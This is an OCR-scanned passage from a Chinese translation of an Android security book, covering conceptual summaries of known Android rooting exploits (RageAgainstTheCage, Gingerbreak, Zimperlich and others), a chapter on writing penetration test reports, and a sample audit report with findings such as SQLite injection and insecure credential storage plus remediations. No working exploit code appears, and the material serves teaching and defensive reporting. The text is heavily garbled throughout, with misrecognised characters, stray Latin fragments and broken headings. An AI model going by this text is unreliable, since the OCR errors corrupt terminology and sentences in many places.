它 验证 Netlink 消息 (一 种 负责 将 Linux 内 核 与 用 户 连接 的 消息 ) 是 否 源 自 原始 来 源 或 是 
由 攻击 者 伪造 。 因 此 ， 攻 击 者 可 以 简单 地 从 用 户 空 间 本 身 发 送 udev 消息 并 提升 权限 。 

e Gingerbreak : 这 是 另 一 个 漏洞 ， 基 于 vold 中 存在 的 漏洞 ， 类 似 于 Exploid 中 的 漏洞 。 

e RageAgainstTheCage : 此 漏洞 利用 基于 RLIMIT_NPROC ， 它 指定 在 调用 setuid 函数 时 可 
为 用 户 创建 的 进程 的 最 大 数目 。adb 守护 程序 以 root 身份 启动 ;然后 它 使 用 setuid() W 
用 来 解除 特权 。 但 是 ， 如 果 根 据 RLIMIT_NPROC 达到 了 最 大 进程 数 ， 程 序 将 无 法 调 
用 setuid() 来 解除 特权 ，adb 将 继续 以 root 身份 运行 。 

e Zimperlich : 使 用 与 RageAgainstTheCage 的 相同 概念 ， 但 它 依赖 于 zygote 进程 解除 
root 权限 。 

e KillinginTheNameOf : 利用 了 一 个 称 为 ashmem (共享 内 存 管 理 器 ) 接口 的 漏洞 ， 该 漏洞 
用 于 更 改 ro.secure 的 值 ， 该 值 确 定 设 备 的 root 状态 。 


这 些 是 一 些 最 知名 的 Android 漏洞 利用 ， 用 于 root Android 设备 。 


及 


Ze 


在 本 章 中 ， 我 们 了 解 了 Android 利用 和 ARM 利用 的 不 同方 式 。 希望 本 章 对 于 任何 想 要 更 深 
入 地 利用 ARM 的 人 来 说 ， 都 是 一 个 好 的 开始 。 


在 下 一 章 中 ， 我 们 将 了 解 如 何 编写 Android 渗透 测试 报告 。 


BAÈ ARM 利用 
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I I pe sg. \ 条 oml 人 
ILE Fa B IE MINIS 
作者 : Aditya Gupta 
译 者 : 飞龙 
It : CC BY-NC-SA 4.0 


在 本 草 中 ， 我 们 将 学 习 涂 透 测试 的 最 终 和 最 重要 的 方面 ， 扎 写 报 告 。 这 是 一 个 简短 的 章节， 
和 导 你 在 报告 中 写 下 你 的 方法 和 发 现 。 作 为 渗透 测试 者 ， 如 果 能 够 更 好 地 解释 和 人 记录 你 的 发 
现 ， 涂 透 测 试 报告 会 更 好 。 对 于 大 乡 数 渗透 测试 者 来 说 ， 这 是 涂 透 测试 中 最 疫 意思 的 部 分 ， 
也 是 最 重要 的 渗透 测试 步 怠 之 一 ， 因 为 它 作 为 “至 关 重 要 的 材料 ”*， 使 其 他 技术 和 管理 人 员 


渗透 测试 报告 是 渗透 测试 过 程 中 所 有 发 现 的 摘要 文档 ， 包 括 但 不 限于 所 使 用 的 方法 ， 工 作 范 
围 ， 假 设 ， 汤 洞 的 严重 程度 等 。 涂 透 测试 报告 仅 用 作 渗 透 测试 的 完整 文档 ， 可 用 于 消除 已 发 
现 的 漏洞 并 进一步 参考 。 


编写 渗透 测试 报告 


为 了 理解 如 何 编写 渗透 测试 报告 ， 最 好 对 渗透 测试 报告 中 的 一 些 重 要 部 分 有 一 个 清晰 的 了 
解 。 


一 些 取 重要 的 组 成 部 分 包括 : 


o 执行 摘要 

。 漏洞 摘要 

。 工作 范围 

o 使 用 的 工具 

o 遵循 的 测试 方法 
e 建议 

e 结论 


e 附录 


除 此 之 外 ， 还 应 该 有 关于 渗透 测试 ， 进 行 涂 选 测试 的 组 织 和 客户 ， 以 及 “ 非 披露 协议 "的 足够 详 
细 信 息 。 让 我 们 一 个 一 个 地 去 看 上 面 的 每 个 部 分 ， 来 快速 查看 它 。 


执行 摘要 


执行 摘要 是 渗透 测试 的 整个 结果 的 快速 演练 。 执行 摘要 不 需要 太 多 技术 ， 它 只 是 一 个 总 结 ， 
用 于 在 尽 可 能 短 的 时 间 内 浏览 渗透 测试 。 执行 摘要 是 管理 层 和 高 管 首 先 看 到 的 。 


它 的 一 个 例子 如 下 : 
XYZ 应 用 程序 的 渗透 测试 具有 大 量 的 开放 输入 验证 缺陷 ， 这 可 能 导致 攻击 者 访问 敏感 数据 。 


你 还 应 该 解释 此 漏洞 对 于 该 组 织 业 务 的 严重 程度 。 


J vA] 

ean ， 这 应 包括 应 用 程序 中 发 现 的 所 有 汤 洞 A 关 详 细 信 息 。 如 果 你 在 应 用 
序 中 找到 的 漏洞 分 配 了 CVE 号码， 你 可 以 包括 它 。 你 还 应 包括 导致 该 汤 洞 的 应 用 程序 的 技 

pe 息 。 另 一 种 展示 漏洞 的 好 方法 是 对 漏洞 按照 类 别 进 行 分 类 : 低 ， 中 和 高 ， 然 后 在 人 饼 

图 或 任何 其 他 图 形 表 示 上 展示 它们 。 
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工作 范围 仅仅 意味 着 渗透 测试 涵盖 并 评估 了 哪些 应 用 程序 和 服务 。 它 可 以 简单 地 写成 一 行 

xz 下 : 


该 工作 的 范围 仅 限 于 XYZ Android 和 iOS 应 用 程序 ， 不 包括 任何 服务 端 组 件 。 


使 用 的 工具 

这 是 一 个 可 选 类 别 ， 通 常 可 以 包含 在 另 一 个 类 别 中 ， 也 就 是 讨论 源 洞 发 现 和 技术 细节 的 地 
ee eumaaee 
遵循 的 测试 方法 


这 个 类 别 是 最 重要 的 类 别 之 一 ， 应 该 以 详细 方式 编写 。 这 里 ， 渗 透 测试 者 需要 指定 不 同 的 技 
术 ， 和 他 在 渗透 测试 阶段 所 遭 循 的 步骤 。 它 可 以 是 简单 的 应 用 程序 北向， 流量 分 析 ， 使 用 不 
同 的 工具 的 库 和 二 进 制 文件 分 析 ， 等 等 。 


此 类 别 应 指定 其 他 人 需要 遵循 的 完整 过 程 ， 以 便 完 全 理解 和 重 现 这 些 漏洞 。 
建议 
类 别 应 指定 要 执行 的 不 同 任 务 ， 以 便 组 织 保 护 程序 并 修复 漏洞 。 这 可 能 包括 一 些 东 西 ， 类 


eS 
Annee 以 适当 权限 保存 文件 ， 加 密 发 送 网 络 流量 以 及 正确 使 用 SSL 等 。 它 还 应 包括 在 考虑 到 
组 织 的 情况 下 ， 执 行 这 些 任务 的 正确 方法 。 


个 部 分 EL TK E al 
a MEFE 
CE By ay Æ 


a] 单 地 总 结 渗透 测试 的 总 体 结 果 ， 并 且 我 们 可 以 使 用 漏洞 类 型 的 概述 ， 简 单 地 
pe o ， 我 们 不 应 该 涉及 所 发 现 的 不 同 漏洞 的 详细 信息 ， 因 为 我 们 
节 中 讨论 过 了 。 


MY 
渗透 测试 报告 的 最 后 一 部 分 应 该 是 附录 ， 或 者 一 个 快速 参考 ， 读 者 可 以 使 用 它 快 速 浏览 渗透 


测试 的 特定 主题 。 


oe 


= 


~ 


在 本 章 中 ， 我 们 对 渗透 测试 报告 的 不 同 部 分 进行 了 快速 演练 ， 涂 透 测 试 者 需要 了 解 这 些 部 分 
能 编写 报告 。 本 草 的 目的 是 在 渗透 测试 的 最 后 阶段 ， 作 为 一 个 编写 渗透 测试 报告 的 简洁 指 
南 。 此 外 ， 你 可 以 在 下 一 页 找到 渗透 测试 报告 的 示例 。 


渗透 测试 人 员 ， 和 想 入 门 Android 安全 的 人 来 说 ， 我 希望 这 本 书 会 成 为 一 个 伟大 的 工 
。 本 书 中 提 到 的 工具 和 技术 将 帮助 你 入 门 Android 安全 。 祝 你 好 运 | 


下 面 是 渗透 测试 报告 的 示例 : 


Attify 漏洞 应 用 安全 审计 报告 


应 用 程序 版 本 : 1.0 
日 期 : 2014 年 1 月 
作者 : Aditya Gupta 


摘要 : 2014 年 1 月 ，Attify 实验 室 对 Android 平台 的 移动 应 用 程 夺 “Attify 漏洞 应 用 "进行 了 安全 
评估 。 本 报告 包含 审计 过 程 中 的 所 有 发 现 。 它 还 包含 首先 发 现 这 些 漏洞 的 过 程 ， 以 及 修复 这 
些 问题 的 方法 。 
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1.1 执行 摘要 
Attify Labs 受 委 托 对 XYZ 公司 的 Android 应 用 程序 “Attify 漏洞 应 用 ?执行 渗透 测试 。 此 渗透 测 


试 和 审计 的 目的 是 确定 Android 应 用 程序 以 及 与 其 通信 的 Web 服务 的 安全 漏洞 


我 们 在 测试 期 间 十 分 小 心 ， 以 确保 在 执行 审计 时 不 会 对 后 端 Web 服务 器 造成 损害 。 该 评估 在 
Aditya Gupta 的 领导 下 进行 ， 团 队 由 三 名 内 部 渗透 测试 人 员 组 成 。 


在 审计 期 间 ， 在 XYZ Android 应 用 程序 和 后 端 Web 服务 中 发 现 了 一 些 安 全 漏洞 。 总 的 来 
说 ， 我 们 发 现 系统 是 不 安全 的 ， 并 且 具 有 来 自 攻 击 者 的 高 威胁 风险 。 


此 次 审计 的 结果 将 有 助 于 XYZ 公司 使 他 们 的 Android 应 用 程序 和 Web 服务 免 受 攻击 者 造成 
的 安全 威胁 ， 这 可 能 会 损害 声誉 和 收入 。 
2.2 Lit 


BATH BEM PT XYZ 公司 的 Android 应 用 程序 ， 名 为 "Attfy HIE A” o BHM 
试 还 包括 所 有 Web 后 端 服务 ，Android 应 用 程序 与 之 进行 通信 。 


1.3 漏洞 摘要 


Android & M 42° “Attify 汤 洞 应 用 ”被 发 现存 在 漏洞 ， 包 括 应 用 程序 本 身 ， 以 及 由 于 在 应 用 程序 
中 使 用 第 三 方 库 的 很 多 漏洞 。 我 们 已 成 功利 用 该 库 ， 使 我 们 可 以 访问 存储 在 设备 上 的 整个 应 
用 程序 的 数据 。 


此 外 ， 在 应 用 程序 中 找到 的 webview 21718 & Fl AEA AD SL Bl JavaScript 响应 的 操纵 ， 使 我 
们 可 以 访问 应 用 程序 中 的 整个 JavaScript 界面 。 这 最 终 允许 我 们 利用 不 安全 网 络 上 的 应 用 程 
序 ， 导 致 应 用 程序 行为 控制 ， 还 允许 我 们 在 用 户 没有 知晓 的 情况 下 安装 更 多 应 用 程序 ， 进 行 
意外 的 拨号 和 发 送 短信 等 。 


在 应 用 程序 中 发 现 的 其 他 漏洞 包括 不 安全 的 文件 存储 ， 一 旦 设备 已 经 root， 这 使 我 们 可 以 访 
问 和 存储 在 应 用 程序 中 的 敏感 用 户 和 凭据 。 


此 外 ， 我 们 可 以 注意 到 ， 应 用 通信 的 web 服务 oe 当 安 全 措施 ， 并 且 可 以 
使 用 SQL 认证 绕 过 攻击 来 访问 存储 在 web 服务 器 上 的 敏感 信息 。 


审计 与 方法 论 
2.1 使 用 的 工具 


VAP xe FT EN RE SE Tp Ho HS MY A LZ YY HELA: 


e 测试 平台 : Ubuntu Linux Desktop v12.04 

e 设备 : 运行 Android v4.4.2 的 Nexus 4 

e Android SDK 

e APKTool 1.5.2 : 将 Android 应 用 程序 反 编 译 成 Smali 源 文件 
e Dex2Jar 0.0.9.15.48 : 将 Android 应 用 程序 源 肥 编译 为 Java 
e JD-GUI 0.3.3 : 读 取 Java JR X4 

e Burp Proxy 1.5: 代理 工具 

e Drozer 2.3.3 : Android 应 用 程序 评估 框架 

e NMAP 6.40 : 4244 Web 服务 


2.2 fail 
问题 #1 : Android & A 427 P 89 7 ATA A 


说 明 : 在 Android 应 用 程序 的 patabaseConnector.java 文件 中 发 现 了 一 个 注入 漏洞 。 参 

数 account_id 和 account_name 被 传递 到 应 用 程序 中 的 SQLite 查询 中 ， 使 其 易于 遭受 SQLite 
EX © 

风险 级 别 : 严重 


修复 : 在 传递 到 数据 库 命令 之 前 ， 应 正确 校 验 用 户 输入 。 


问题 #2 : webview 组 件 中 的 漏洞 


说 明 : webDisplay.java 文件 中 指定 的 Android 应 用 程序 中 的 webview 组 件 允 许 执行 
JavaScript。 攻 击 者 可 以 拦截 不 安全 网 络 上 的 流量 ， 创 建 自 定义 响 应 ， 并 控制 应 用 程序 。 


iF 


补救 : 如 果 应 用 程 友 中 不 需要 JavaScript » 请 将 setJavascriptEnabled 设置 为 False 。 
问题 #3 : 无 / 弱 加 密 


说 明 : Android 应 用 程序 将 认证 凭据 和 存储 在 名 为 prefs.db 的 文件 中 ， 该 文件 存储 在 设备 上 的 应 
用 程序 文件 夹 中 ， 即 /data/data/com.vuln.attify/databases/prefs.db 。 通 过 root 权限 ， 我 们 
能 够 成 功 地 查看 存储 在 文件 中 的 用 户 凭 据 。 身 份 难 证 凭据 以 Base64 编码 存储 在 文件 中 。 


z 
iF 


补救 : 如 果 认 证 证 书 必 须 存储 在 本 地 ， 则 应 使 用 适当 的 安全 加 密 和 人 和 储 。 
问题 #4 : 荔 膏 攻击 的 内 容 供 应 器 


说 明 : RIL Android 应 用 程序 的 内 容 供 应 器 已 导出 ， 这 使 得 它 也 可 以 由 设备 上 存在 的 任何 其 
We Jot. FR] AB > AX JE] o 内 容 供 应 器 是 content://com.vuln. attify/mycontentprovider ° 


风险 等 级 


补救 : 使 用 exported = false ， 或 在 AndroidManifest.xml 中 指定 内 容 供 应 器 的 权限 。 


3. 2 72 St 


3.1 结论 

我 们 发 现 该 应 用 程序 整体 上 存在 漏洞 ， 拥 有 内 容 供 应 蜂 ，SQLite 数据 库 和 数据 存储 技术 相关 
的 漏洞 。 

3.2 建议 


我 们 发 现 该 应 用 程序 容 多 受到 一 些 严 重 和 高 危 漏洞 的 攻击 。 付 诸 一 些 精力 和 安全 的 编码 实 
BR? ene 


为 了 维持 应 用 程序 的 安全 ， 需 要 定期 进 审计 ， 来 在 每 次 主要 升级 之 前 评估 应 用 程序 的 
安全 性 。 


